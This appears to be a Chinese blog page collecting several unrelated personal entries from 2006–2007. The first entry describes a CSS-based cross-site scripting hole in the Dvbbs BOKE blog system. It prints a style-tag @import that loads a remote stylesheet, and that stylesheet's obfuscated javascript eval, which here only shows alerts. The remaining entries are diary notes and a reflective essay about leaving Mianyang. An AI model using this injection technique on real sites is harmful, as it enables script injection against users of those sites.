前一段时间,找到了动网 BOKE的跨站漏洞,这个漏洞可以用CSS来跨站,也就是样式表,具体的跨站方法是:
选择"代码"方式,在其中输入以下代码:
<style type='text/css'>@import url(http://www.pc010.cn/1.css);</style>
其中的@import 是CSS的自定义属性,url是要链接的CSS样式,而 http://www.pc010.cn/1.css 的内容如下:
<style type="text/css">
<!--
@import url(javascript:eval(String.fromCharCode(97,108,101,114,116,40,39,84,101,115,116,32,49,39,41,59,97,108,101,114,116,40,39,84,101,115,116,32,50,39,41,59)));
-->
</style>
这是一段弹出alert窗口的代码,其中的String.fromCharCode是用来将字符转为ASCII值的函数。
昨天老爸说今天会有10级大风,我怎么也想不到这个偏僻的山区会有这么大的风。开玩笑对隔房表姐说,你还是把你的信用卡拿上躲到红薯窖里面去吧,呵呵。
结果风确实起了,但没有预报的那么大。
最近手气不错,昨天又赢钱了。不过这样下去,朋友们都要说我成赌徒了。
有点郁闷,TOM那边出了点状况,下起了暴雪!等会上QQ问问情况再说。
先这样了。
写于2007年3月4日,记录当时的生活片段。
樱花又开了,春天真的来了。
每年这个时候,看到满树的樱花,总是让人心情愉悦。粉色的花瓣在微风中轻舞,仿佛在告诉我们,新的一年又开始了。
拍摄于2007年3月1日
天气:多云
秋天还没到来,我却又要飘了,然而,此时此刻却再没有黄叶做伴....
绵阳是一个不大不小的城市,拥有形形色色其他城市不能攀比的韵味。可是我却并不留恋在一个固定的地方,比如这个城市。当然,除了我在绝望时会怀念归宿,我就绝不会有其他例外了。我不知道什么东西才能抵制住我飘的欲望,也许,根本就不会有什么东西来抑制我的思想,又或许我本来就注定是漂浮不定的...
明天,我就要踏上回家的列车回到我久违的故乡,我知道那里现在一定是绿树成荫,花开正好,温度适宜清爽的美好季节。我明白,在那样的空间里面会让我忘记很多不想纪念的事情,我期待父亲叫我吃饭的声音,依然怀念我和老爸抢电脑玩的那激动场面,甚至是一起玩玩麻将也行,这都是令我神往的事情,当然这只是在一种特定场面下的幸福感觉!
对于绵阳,我不知道我到底收获了什么,或者是收益了什么,更或者是说我为什么能够在绵阳待这么久,我都不是很清楚。唯一肯定的是工作是次要的约束因素,更主要在于某种精神或者是某种执着。当然,我的再次漂泊不能毫无凭据地就说我已经没了那种精神或者是执着,我想环境会改变一个人的思想,并且完善它!
这一次漂流大行动中,我为了给自己一个很好的理由,我说了,下一个城市一定更美,那里会拥有AS ROMA的火爆,也拥有酒吧的另类,并且又有着能美容的空气...有什么理由不离开这里去创造,去发掘,去适应一个新的城市呢?
...我说了,我的离开对我来说不惨淡,而是对这里的一些朋友们来讲,我是不应该离开的!
八月的时候,我又在期待明年的沿海,明年的华侨,明年的那所大学,我相信,命运总是公平的。
写于2006年7月23日 17:14 QQ空间
那些年轻时关于漂泊与归宿的思考